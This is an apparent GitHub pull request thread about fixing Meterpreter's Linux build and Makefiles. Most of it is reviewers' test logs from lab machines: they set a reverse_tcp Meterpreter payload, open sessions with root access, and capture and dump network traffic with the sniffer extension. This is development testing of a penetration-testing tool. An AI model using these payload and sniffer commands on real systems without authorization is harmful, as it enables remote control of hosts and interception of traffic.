support building on newer Linux systems and Makefile cleanups

[bcook-r7]

This fixes some issues building Meterpreter under recent linux distributions and quiets some of the noise to make further development feasible.

• try to share some bits between different makefiles, make modifying global compiler flags not such a huge pain.
• directly specify we should be using the gold rather than bpf linker
• make compiler output largely quiet except where we care - allow warnings to actually be visible
• don't delete downloaded tarballs with --really-clean
• add missing dependencies between libraries (--no-add-needed/--no-copy-dt-needed-entries causes lots of trouble)
• update readme to show what to install to build

I made minimal changes to the loader makefile - it breaks easily.
-Os prevents if from being able to load libc, for instance

Verification Steps

On Ubuntu 14.04 or Fedora 21 x64, try these things:

• install recommended packages in the README.md file
• run 'make really-clean && make && make install'
• verify that it runs and installs new binaries in your metasploit-framework directory
• verify that you can start a meterpreter shell
• load networkpug
• load sniffer

Build should look a little nicer, it stashes a lot of the 3rd party build noise into log files:

$ make
Building libc
Building libm
Building libdl
Building OpenSSL
Installing libcrypto
Installing libssl
make -C workspace/common
make[1]: Entering directory `/home/bcook/projects/meterpreter/workspace/common'
[CC] args.o
[CC] base.o
[CC] unix_socket_server.o
[CC] passfd_server.o
[CC] ptrace.o
[CC] base_inject.o
[CC] base_dispatch.o
[CC] base_dispatch_common.o
[CC] buffer.o
[CC] channel.o
[CC] common.o

Though the extensive use of 'HANDLE' in a unix environment is imperfect, so there are lots of bad casts and things that will be solved later. My editor also auto-deletes trailing whitespace on save, so sorry in advance for the noise.

[bcook-r7]

This addresses #114 and #115

[bcook-r7]

Hmm, it failed on whatever travis runs - time to play whack-a-build :)

[metasploit-public-bot]

Test PASSED.
Refer to this link for build results (access rights to CI server needed):
https://ci.metasploit.com//job/GPR-MeterpreterWin/139/
Test PASSED.

[metasploit-public-bot]

Test PASSED.
Refer to this link for build results (access rights to CI server needed):
https://ci.metasploit.com//job/GPR-MeterpreterWin/140/
Test PASSED.

[jvazquez-r7]

Giving a chance to it!

[jvazquez-r7]

• Compiled okey with Ubuntu 10.04, and tested successfully on Ubuntu 10.04:

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.221
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.221:39574) at 2015-01-16 15:20:33 -0600

meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_start 3
[*] Capture started on interface 3 (50000 packet buffer)
meterpreter > sniffer_stats 3
[*] Capture statistics for interface 3
    packets: 593
    bytes: 76093
meterpreter > sniffer_stop 3
[*] Capture stopped on interface 3
[*] There are 593 packets (76093 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 3 /tmp/test.pcap
[*] Flushing packet capture buffer for interface 3...
[*] Flushed 593 packets (87953 bytes)
[*] Downloaded 100% (87953/87953)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test.pcap
meterpreter >

I need to compile on different platforms and test some ubuntu / fedora versions, will land if no stoppers, look good to me =)

[jvazquez-r7]

Working on fedora 15:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.193
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.193:55058) at 2015-01-16 15:27:43 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > load networkplug
Loading extension networkplug...
[-] Failed to load extension: No module of the name ext_server_networkplug.lso found
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 1322
    bytes: 183564
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 1324 packets (183682 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 2 /tmp/test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 1324 packets (210162 bytes)
[*] Downloaded 100% (210162/210162)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test2.pcap
meterpreter >

[jvazquez-r7]

Fedora 20 (64 bits)

msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.211
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.211:58593) at 2015-01-16 15:45:04 -0600
i
meterpreter > interfaces
[-] Unknown command: interfaces.
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'eno16777736' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 39
    bytes: 3108
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 41 packets (3232 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test3.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 41 packets (4052 bytes)
[*] Downloaded 100% (4052/4052)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test3.pcap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.211 - Meterpreter session 3 closed.  Reason: User exit

[jvazquez-r7]

Ubuntu 14.04:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 172.16.158.197
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.197:59951) at 2015-01-16 16:01:07 -0600

meterpreter > load sniffer
Loading extension sniffer...success.
gmeterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
s[*] Capture statistics for interface 2
    packets: 23
    bytes: 1904
meterpreter > sniffer_stop 2
snif[*] Capture stopped on interface 2
[*] There are 26 packets (2090 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test4.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 26 packets (2610 bytes)
[*] Downloaded 100% (2610/2610)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test4.pcap
meterpreter > exit
[*] Shutting down Meterpreter...

Coolio! :-) I'm try to compile on other systems now !

[jvazquez-r7]

• Binaries compiled successfully on Ubuntu 14.04:

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.158.197
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.197:59958) at 2015-01-16 16:28:44 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > show options
[-] Unknown command: show.
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 12
    bytes: 1074
meterpreter > sniffer_stop 2
^[[A[*] Capture stopped on interface 2
[*] There are 14 packets (1180 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/test33.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 14 packets (1460 bytes)
[*] Downloaded 100% (1460/1460)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test33.pcap
meterpreter >

=)

[jvazquez-r7]

When compiling on fedora 15:

$ make
cc1: error: unrecognized command line option ‘-fuse-ld=gold’

Which according to what I discussed @bcook-r7 has sense. Honestly I feel like it's better to have meterpreter compiling without special tweaking/problems on modern distributions, even when the use-ld option could be not available on older distributions with older gcc toolchains...

[jvazquez-r7]

Build on Fedora 20 has been successful:

The built binaries work on fedora:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...



[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1245184 bytes) to 172.16.158.189
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.189:36397) at 2015-01-16 16:45:04 -0600

meterpreter >
meterpreter >
meterpreter >
meterpreter > load
load networkpug  load sniffer
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'eno16777736' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_
sniffer_dump        sniffer_interfaces  sniffer_release     sniffer_start       sniffer_stats       sniffer_stop
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 10
    bytes: 883
meterpreter > sniffer_stop 2
sniffer_[*] Capture stopped on interface 2
[*] There are 10 packets (883 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/more.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 10 packets (1083 bytes)
[*] Downloaded 100% (1083/1083)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/more.pcap
meterpreter >

And ubuntu 14.04:

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1245184 bytes) to 172.16.158.197
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.197:59959) at 2015-01-16 16:47:19 -0600

gmeterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
smeterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > load networkpug
Loading extension networkpug...success.
meterpreter > sniffer_interfaces

1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats
[-] Usage: sniffer_stats [interface-id]
meterpreter > sniffer_start 2
[-] sniffer_capture_start: Operation failed: 22
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 2
    bytes: 198
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
    packets: 12
    bytes: 1166
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 12 packets (1166 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/more.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 12 packets (1406 bytes)
[*] Downloaded 100% (1406/1406)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/more.pcap
meterpreter >

[jvazquez-r7]

Definitely it's much better than the actual built I think, even when the build will fail on older gcc chains (see Fedora 15). Maybe worths to add some documentation to the Readme.md with some guidance about where to build the linux flavor of meterpreter =)

[OJ]

[bcook-r7]

Hmm, I thought I took care of older compilers with this one little trick that dentists hate: 9c15923

That was largely to make Travis CI happy, guess I missed a spot.

[jvazquez-r7]

@bcook-r7 ooom damnit maybe my fault, stopped the build after seeing that message. Re-run it an got an wget stopper after that message..., really? xD

• Fedora 15 32 bits (full build output)

$ make
cc1: error: unrecognized command line option ‘-fuse-ld=gold’
Building libc
Building libm
Building libdl
Building OpenSSL
--2014-06-26 15:59:05--  https://www.openssl.org/source/openssl-0.9.8za.tar.gz
Resolving www.openssl.org... 185.9.166.106
Connecting to www.openssl.org|185.9.166.106|:443... connected.
ERROR: cannot verify www.openssl.org’s certificate, issued by “/C=BE/O=GlobalSign nv-sa/CN=GlobalSign Domain Validation CA - SHA256 - G2”:
  Issued certificate not yet valid.
To connect to www.openssl.org insecurely, use ‘--no-check-certificate’.
make: *** [posix-meterp-build-tmp/openssl-0.9.8za/libssl.so] Error 5

[jvazquez-r7]

maybe it couldn't verify the current openssl certificate at that time :? I dunno for sure...

[bcook-r7]

Nah, fedora 15 probably really has outdated SSL certs and actually can't verify properly. But, it feels wrong to download an SSL library without checking its validity. Would anyone get mad if I just checked in the darn tarballs somewhere?

The first message is just the makefile checking if -fuse-ld-gold is accepted by the compiler, not an actual error :)

[jvazquez-r7]

@bcook-r7 coolio :-) so that's all! Really nice PR!

[hdm]

@bcook-r7 Does this support building binaries that run on really old kernels? (2.4.x)

[jvazquez-r7]

@hmoore-r7 @bcook-r7 wanted to say yes :P, but I had to check... I'm a coward...

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:32777) at 2015-01-16 20:03:25 -0600

meterpreter > getuid
sServer username: uid=500, gid=500, euid=500, egid=500, suid=500, sgid=500
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.4.21-52.EL #1 Fri Sep 28 13:48:28 CDT 2007 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >

[jvazquez-r7]

@bcook-r7 @hmoore-r7 binaries can be tested from this branch rapid7/metasploit-framework#4600

btw, @bcook-r7 should review that PR, just to be sure the binaries I'm attaching are good, or if there is just a procedure I'm forgetting to update binaries :)

[hdm]

@jvazquez-r7 thanks!